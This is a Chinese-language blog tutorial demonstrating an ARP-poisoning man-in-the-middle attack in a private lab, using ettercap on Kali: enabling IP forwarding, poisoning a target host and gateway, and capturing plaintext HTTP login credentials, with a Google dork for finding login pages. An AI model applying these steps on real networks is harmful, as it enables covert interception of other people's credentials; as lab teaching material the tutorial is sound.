theKingOfNight's Blog

中间人攻击--Middle_Attack

Word count: 490Reading time: 1 min
2019/01/19 Share

理论基础

现在的计算机中都会维持一张arp表

1
2
大约每5分钟,arp表更新一次。
如果每5分钟相邻主机有变换或者arp请求有变换,则arp表更新

image.png

1
2
3
网关:192.168.230.2
攻击主机:192.168.230.128
目标主机:192.168.230.133

1
2
3
4
5
6
7
tips
以上述三种主机为例
攻击主机疯狂的向网关说我的ip是192.168.230.133
攻击主机疯狂的和目标主机说我是网关
然后网关的arp表会将攻击主机当做目标主机
目标主机会将攻击主机当做网关

image.png

环境配置

使用工具ettercap(kali自带)

image.png

配置

1
2
1.修改配置文件
vi /etc/ettercap/etter.conf

image.png

取消这一行的数据

image.png

1
2
3
4
2.转发功能默认关闭
/proc/sys/net/ipv4/ip_forward默认为0
开启端口转发功能(具备路由器的功能)
echo 1 >/proc/sys/net/ipv4/ip_forward
1
2
3
4
tip
上面的2是临时将开启端口转发功能,重启失效。
如果需要长期开启的可以
vi /etc/sysctl.conf

image.png

1
2
3
3.更新策略
输入命令
sysctl -a

实战中间人攻击

1
2
3
4.启动ettercap
终端
ettercap -G

image.png

1
2
选择eth0
监听网卡0
1
2
扫描主机
Hosts->Scan for hosts
1
2
查看主机列表
Hosts->Host List

image.png

1
2
3
分别设置目标主机和网关
Add to Target 1 ->192.168.230.133
Add to Target 2 ->192.168.230.2

1
2
3
4
开始攻击
Mitm->ARP poisoning...
选择Sniff remote connections
确定
1
2
3
然后在192.168.230.133中打开一个http的后台登录网站
这里为了方便,直接给大家语法(帮助小白)
inurl:login.php

image.png

1
2
3
4
5
这里我直接使用测试数据
用户名:admin
密码:admin
验证码:2224
点击确定后,可以在攻击主机中直接看到输入的内容

image.png

1
同时显示了密码错误,这样就在受害者毫不知情的条件下成功的截获了http包。

一个简单的中间人攻击就成功完成。

CATALOG
  1. 1. 理论基础
  2. 2. 环境配置
    1. 2.1. 配置
  3. 3. 实战中间人攻击